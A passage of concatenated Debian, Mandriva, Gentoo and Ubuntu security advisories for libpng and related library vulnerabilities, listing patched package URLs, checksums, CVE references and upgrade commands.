http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb\n    Size/MD5 checksum:    85270 1fcfca5bfd47a2f6611074832273ac0b\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb\n    Size/MD5 checksum:   188124 703758e444f77281b9104e20c358b521\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb\n    Size/MD5 checksum:   179186 d2596f942999be2acb79e77d12d99c2e\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb\n    Size/MD5 checksum:    69056 4bd8858ff3ef96c108d2f357e67c7b73\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb\n    Size/MD5 checksum:    63714 14bd7b3fa29b01ebc18b6611eea486d1\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb\n    Size/MD5 checksum:   168764 54a349016bbdd6624fe8552bd951fee0\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb\n    Size/MD5 checksum:   182720 79e501f9c79d31b0f9c8b5a4f16f6a2e\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb\n    Size/MD5 checksum:    74440 e240adb3f2b0f8ed35a3c2fe2dd35da1\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb\n    Size/MD5 checksum:   187052 e5f7162d516fc3d8e953726d7fb5b6ae\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb\n    Size/MD5 checksum:   194360 83928ed4057deade50551874a6a85d27\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb\n    Size/MD5 checksum:    67656 66d9d533e26e4f74fbdd01bf55fa40b1\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb\n    Size/MD5 checksum:   187710 20da5a533679aee19edf5cd0c339f2c9\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb\n    Size/MD5 checksum:   170784 b19d4f0f8be4d65dbb847079ce2effa8\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb\n    Size/MD5 checksum:   227792 eb01ade8e4b4dba3215832b8c632548a\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb\n    Size/MD5 checksum:   108076 cb3ae7c7c66dcafce969608a437fdade\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb\n    Size/MD5 checksum:   227388 83fa9e2ba1a370fe1b973688ab6096dd\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb\n    Size/MD5 checksum:   187814 daa3c7c3aeae294c661324528e0f6c3e\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb\n    Size/MD5 checksum:   187016 e556557c1c570c66656232422af38c8e\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb\n    Size/MD5 checksum:    67730 ae7ea1cd95eacae754ba35e9fae19818\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb\n    Size/MD5 checksum:    67996 4be0aa40152ac55a7355aea2204d7888\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb\n    Size/MD5 checksum:   187852 19a6eddae81d4f9d768f8c0ef442b0ed\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb\n    Size/MD5 checksum:   187282 119ae6083edd419fed3fe970cc507919\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb\n    Size/MD5 checksum:   178452 e48dc544abc3df3ec474930639e29469\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb\n    Size/MD5 checksum:   186636 b8319bb815dec618288cdd35cd37c191\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb\n    Size/MD5 checksum:    67430 a3717e7c30011e60be99ce04983f2984\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb\n    Size/MD5 checksum:   178548 790f01dc85511343a4ef9b4832f3b1fa\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb\n    Size/MD5 checksum:   190648 a79ea20f0b8af58765d2b14ec276aa5a\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb\n    Size/MD5 checksum:    71438 aa83c3a2ab4da51670da3eafcedddac9\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb\n    Size/MD5 checksum:    64914 13bcdda845e00493e1b25413452302d0\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb\n    Size/MD5 checksum:   184734 0f0e7865607948f07a604c86fd4f94bb\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb\n    Size/MD5 checksum:   172558 2853d84c9f9823d0bfe77b1fca00348d\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz\n    Size/MD5 checksum:    16783 64d84ee2a3098905d361711dc96698c9\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz\n    Size/MD5 checksum:   783204 13a0de401db1972a8e68f47d5bdadd13\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc\n    Size/MD5 checksum:     1492 8c82810267b23916b6207fa40f0b6bce\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb\n    Size/MD5 checksum:      878 8d46f725bd49014cdb4e15508baea203\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb\n    Size/MD5 checksum:   287802 470918bf3d543a1128df53d4bed78b3f\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb\n    Size/MD5 checksum:   182372 df321c1623004da3cf1daacae952e8b6\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb\n    Size/MD5 checksum:    86746 975dccb76f777be09e8e5353704bf6bf\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb\n    Size/MD5 checksum:    71944 3f3bdfdee4699b4b3e5c793686330036\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb\n    Size/MD5 checksum:   254598 122c139abf34eb461eca9847ec9dffe7\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb\n    Size/MD5 checksum:   167190 1c17a5378b2e6b8fa8760847510f208b\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb\n    Size/MD5 checksum:   245788 9d3fe182d56caad3f9d8a436ca109b57\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb\n    Size/MD5 checksum:    64754 81ee041de30e2e5343d38965ab0645c1\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb\n    Size/MD5 checksum:   160222 5741adc357ec8f3f09c4c8e72f02ec88\n\narmel architecture (ARM EABI)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb\n    Size/MD5 checksum:    67178 71747c7d6f7bffde46bb38055948b781\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb\n    Size/MD5 checksum:   246680 bb9df968f72c62d5adceab0079c86e02\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb\n    Size/MD5 checksum:   163028 60bf255a23031c9c105d3582ed2c21bd\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb\n    Size/MD5 checksum:   261298 a0bac6595474dc5778c764fab4acd9be\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb\n    Size/MD5 checksum:   170170 de217ce54775d5f648ad369f4ce7cb72\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb\n    Size/MD5 checksum:    74124 affd4f1155bd1d571615b6c767886974\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb\n    Size/MD5 checksum:    70314 865ea6726b205467e770d56d1530fdd2\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb\n    Size/MD5 checksum:   165892 cfcd37b7eee72625d13f09328bc24e23\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb\n    Size/MD5 checksum:   247056 bc860a52608d966576f581c27e89a86c\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb\n    Size/MD5 checksum:   305532 d6f329a47a523353fcd527c48abb078c\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb\n    Size/MD5 checksum:   207604 78b003ade0b48d1510f436f2e5008588\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb\n    Size/MD5 checksum:   112070 a0f1e5e8a85bcc1995faa1e031f5e16e\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb\n    Size/MD5 checksum:    68198 a68e0ba1f7a39bd9984414f4160de5bc\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb\n    Size/MD5 checksum:   262138 f3580912592abe14609134cab2242728\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb\n    Size/MD5 checksum:   163666 0c9f75230c396553e6062eb397d6b95c\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb\n    Size/MD5 checksum:   163956 dfda7e322af96e8ae5104cfd9f955e92\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb\n    Size/MD5 checksum:    68468 9c357d2d831dca03ed0887c58a18c523\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb\n    Size/MD5 checksum:   262162 a1d0ba1b7adb92a95180e6d65b398b5b\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb\n    Size/MD5 checksum:    70814 3053467f8b8864802cc7261742abfa00\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb\n    Size/MD5 checksum:   166240 13acfd773d2a31bd555ac1936411fe95\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb\n    Size/MD5 checksum:   253322 d4a722d84e5c2f263d72a59dea00ce17\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb\n    Size/MD5 checksum:   253696 bc748b49195dcd01b5288349e3e85510\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb\n    Size/MD5 checksum:    73624 f35735be37fc376c56941795a185c742\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb\n    Size/MD5 checksum:   169052 4cf962619d634ea59a39d14c32134594\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb\n    Size/MD5 checksum:    66216 07bcad5c11908d2fe6d358dfc94d9051\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb\n    Size/MD5 checksum:   247212 f388365559e6b9313aa6048c6fa341f9\n  http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb\n    Size/MD5 checksum:   162316 16f01a96b1fec79e9614df831dba6a05\n\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show \u003cpkg\u003e\u0027 and http://packages.debian.org/\u003cpkg\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niQEcBAEBAgAGBQJJxnKQAAoJEL97/wQC1SS+7ecIAK6BKrPXLVq6hmj7dJLZWixA\n4HMxumeGDUKuJBAxgQzB1jj1y4M3lnNVcVvOSfelxSO8lQLbFH1A3NGOthP1552h\nsjkFurJBpDDoAQWnfG8pHvUuou7/BWis/E0Av3JCLVV9CBfPHX2QVHHK4MvU/btY\nfHqm8ye00ae+CIzkpWpPpBJjsGIWOrLGVhrUGVxN/1nwu4cvBRj1Np/sCUo+3A0o\nOFwc/5RGwh4HMV7E3LyarlDQTkAQ0prMepxDe1mFalz2UA0zgqIZclUvq8JX2Y1S\ns0WWPLVFu+1uEBkAe4MvhoM7FH3K0NbKsfl214DVasUKFIMTR1kywh44Dho2j7g=\n=mMEO\n-----END PGP SIGNATURE-----\n. \n \n The updated packages have been patched to correct this issue. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445\n http://www.cert.org/advisories/684664\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2007.0:\n 4483193885966f919f283594719a0a90  2007.0/i586/libpng3-1.2.12-2.3mdv2007.0.i586.rpm\n d13427f7a6494c82a8becec26aaa158f  2007.0/i586/libpng3-devel-1.2.12-2.3mdv2007.0.i586.rpm\n 86e2b902df20f46bbab8c198be7bb623  2007.0/i586/libpng3-static-devel-1.2.12-2.3mdv2007.0.i586.rpm \n 2351bce470227141eecf5a3adb303ce7  2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n 80168137deb6e23d5a2fb6e8f3abc2ef  2007.0/x86_64/lib64png3-1.2.12-2.3mdv2007.0.x86_64.rpm\n b45baf5195b6ffd1d32b5829ff861b50  2007.0/x86_64/lib64png3-devel-1.2.12-2.3mdv2007.0.x86_64.rpm\n 9e4f1d18db609adc5c2f92629814e360  2007.0/x86_64/lib64png3-static-devel-1.2.12-2.3mdv2007.0.x86_64.rpm \n 2351bce470227141eecf5a3adb303ce7  2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm\n\n Mandriva Linux 2007.1:\n 300ed9a63f60a1ee16ce4e5caa71f96b  2007.1/i586/libpng3-1.2.13-2.1mdv2007.1.i586.rpm\n fdd3c3cefc587622382d37cd5fe2795e  2007.1/i586/libpng3-devel-1.2.13-2.1mdv2007.1.i586.rpm\n d6b13aa08877aec2aaf165203d2a6817  2007.1/i586/libpng3-static-devel-1.2.13-2.1mdv2007.1.i586.rpm \n 00e882bf543c8730d656417304f3b4e1  2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm\n\n Mandriva Linux 2007.1/X86_64:\n f1289336b45eb58bc2975011086fbfa9  2007.1/x86_64/lib64png3-1.2.13-2.1mdv2007.1.x86_64.rpm\n 8dc0504ac8c6ed8e6c5f641c738df144  2007.1/x86_64/lib64png3-devel-1.2.13-2.1mdv2007.1.x86_64.rpm\n d0b9f63131ecbfe01db295d15903fd40  2007.1/x86_64/lib64png3-static-devel-1.2.13-2.1mdv2007.1.x86_64.rpm \n 00e882bf543c8730d656417304f3b4e1  2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm\n\n Corporate 3.0:\n 9c0077ae596e6a2340ed6e08ab6c437c  corporate/3.0/i586/libpng3-1.2.5-10.8.C30mdk.i586.rpm\n 2f44c9f5639aff57948b64cf845efa39  corporate/3.0/i586/libpng3-devel-1.2.5-10.8.C30mdk.i586.rpm\n e1638f0497b35341796bb74ccb5a95e7  corporate/3.0/i586/libpng3-static-devel-1.2.5-10.8.C30mdk.i586.rpm \n 5905453feaf135e67bbdf4fecbc55335  corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 632b1254a5b2ee4def5ac2f98bc7bd4c  corporate/3.0/x86_64/lib64png3-1.2.5-10.8.C30mdk.x86_64.rpm\n b4ad3f3a34be89a22c7bdfcb8b9f351d  corporate/3.0/x86_64/lib64png3-devel-1.2.5-10.8.C30mdk.x86_64.rpm\n 419f3faddaeb3cbfa3ca020630858682  corporate/3.0/x86_64/lib64png3-static-devel-1.2.5-10.8.C30mdk.x86_64.rpm \n 5905453feaf135e67bbdf4fecbc55335  corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm\n\n Corporate 4.0:\n a444aa0f9b3c0e5bac0562b3274806a5  corporate/4.0/i586/libpng3-1.2.8-1.3.20060mlcs4.i586.rpm\n 25542984f9b920e9ab9197d383c201b9  corporate/4.0/i586/libpng3-devel-1.2.8-1.3.20060mlcs4.i586.rpm\n a0c238ea1c16f892b704b5055fcc340d  corporate/4.0/i586/libpng3-static-devel-1.2.8-1.3.20060mlcs4.i586.rpm \n 9442bef36dbda9e9518ce367a7569d90  corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n 2ff58096a6a2961e15719aa35107fda6  corporate/4.0/x86_64/lib64png3-1.2.8-1.3.20060mlcs4.x86_64.rpm\n 78ecdacb1033eecfbf48e464d3106bb1  corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm\n 85ee7effc74676da27c1c2c1219b97a7  corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm \n 9442bef36dbda9e9518ce367a7569d90  corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n ea358d9ef4e412851f89abac96d015b7  mnf/2.0/i586/libpng3-1.2.5-10.8.M20mdk.i586.rpm \n 3068b2316e8225377b88dcaedbadb878  mnf/2.0/SRPMS/libpng-1.2.5-10.8.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.7 (GNU/Linux)\n\niD8DBQFGZcKYmqjQ0CJFipgRAiL/AKDsmAXcJqycmwk5iMfPgWrV8Rl98gCgoeUN\nfefbLet+er8fbszmcgzIKUo=\n=rUB+\n-----END PGP SIGNATURE-----\n\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201412-11\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: AMD64 x86 emulation base libraries: Multiple vulnerabilities\n     Date: December 12, 2014\n     Bugs: #196865, #335508, #483632, #508322\n       ID: 201412-11\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in AMD64 x86 emulation base\nlibraries, the worst of which may allow remote execution of arbitrary\ncode. \n\nBackground\n==========\n\nAMD64 x86 emulation base libraries provides pre-compiled 32-bit\nlibraries. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  app-emulation/emul-linux-x86-baselibs\n                               \u003c 20140406-r1           \u003e= 20140406-r1\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in AMD64 x86 emulation\nbase libraries. Please review the CVE identifiers referenced below for\ndetails. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll users of the AMD64 x86 emulation base libraries should upgrade to\nthe latest version:\n\n  # emerge --sync\n  # emerge -1av \"\u003e=app-emulation/emul-linux-x86-baselibs-20140406-r1\"\n\nNOTE: One or more of the issues described in this advisory have been\nfixed in previous updates. They are included in this advisory for the\nsake of completeness. It is likely that your system is already no\nlonger affected by them. \n\nReferences\n==========\n\n[  1 ] CVE-2007-0720\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0720\n[  2 ] CVE-2007-1536\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1536\n[  3 ] CVE-2007-2026\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2026\n[  4 ] CVE-2007-2445\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2445\n[  5 ] CVE-2007-2741\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741\n[  6 ] CVE-2007-3108\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3108\n[  7 ] CVE-2007-4995\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4995\n[  8 ] CVE-2007-5116\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5116\n[  9 ] CVE-2007-5135\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5135\n[ 10 ] CVE-2007-5266\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5266\n[ 11 ] CVE-2007-5268\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5268\n[ 12 ] CVE-2007-5269\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5269\n[ 13 ] CVE-2007-5849\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5849\n[ 14 ] CVE-2010-1205\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205\n[ 15 ] CVE-2013-0338\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338\n[ 16 ] CVE-2013-0339\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0339\n[ 17 ] CVE-2013-1664\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664\n[ 18 ] CVE-2013-1969\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969\n[ 19 ] CVE-2013-2877\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877\n[ 20 ] CVE-2014-0160\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0160\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-11.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. =========================================================== \nUbuntu Security Notice USN-472-1              June 11, 2007\nlibpng vulnerability\nCVE-2007-2445\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 6.10\nUbuntu 7.04\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  libpng12-0                               1.2.8rel-5ubuntu0.2\n\nUbuntu 6.10:\n  libpng12-0                               1.2.8rel-5.1ubuntu0.2\n\nUbuntu 7.04:\n  libpng12-0                               1.2.15~beta5-1ubuntu1\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nDetails follow:\n\nIt was discovered that libpng did not correctly handle corrupted CRC\nin grayscale PNG images. \n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz\n      Size/MD5:    16483 713a6e035fa256e4cb822fb5fc88769b\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc\n      Size/MD5:      652 bc4f3f785816684c54d62947d53bc0db\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz\n      Size/MD5:   510681 cac1512878fb98f2456df6dc50bc9bc7\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb\n      Size/MD5:      846 76eab5d9a96efa186d66cf299a4f6032\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb\n      Size/MD5:    69484 078e25586525c4e83abf08c736fa6bd8\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb\n      Size/MD5:   113888 46fce5d27ac4b2dea9cf4deb633f824e\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb\n      Size/MD5:   247528 68879285068cda170eef5a5f56594a1c\n\n  i386 architecture (x86 compatible Intel/AMD)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb\n      Size/MD5:    66932 12cafbea44a3e7cf109eb24cb47aa557\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb\n      Size/MD5:   111396 3a93335c2a072b2e2c94bc2cc0b3d77e\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb\n      Size/MD5:   239662 64029c30dac5152c97e1a0d864c981d0\n\n  powerpc architecture (Apple Macintosh G3/G4/G5)\n\n    http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb\n      Size/MD5:    66304 0cbf98391b6c3219f83cd24cefe0343c\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb\n      Size/MD5:   110828 62c7a8ccc58c86414bcd170c394f8240\n    http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb\n      Size/MD5:   245220 1171c8638ec8ebc2c81f53706885b692\n\n  sparc architecture (Sun SPARC/UltraSPARC)\n\n    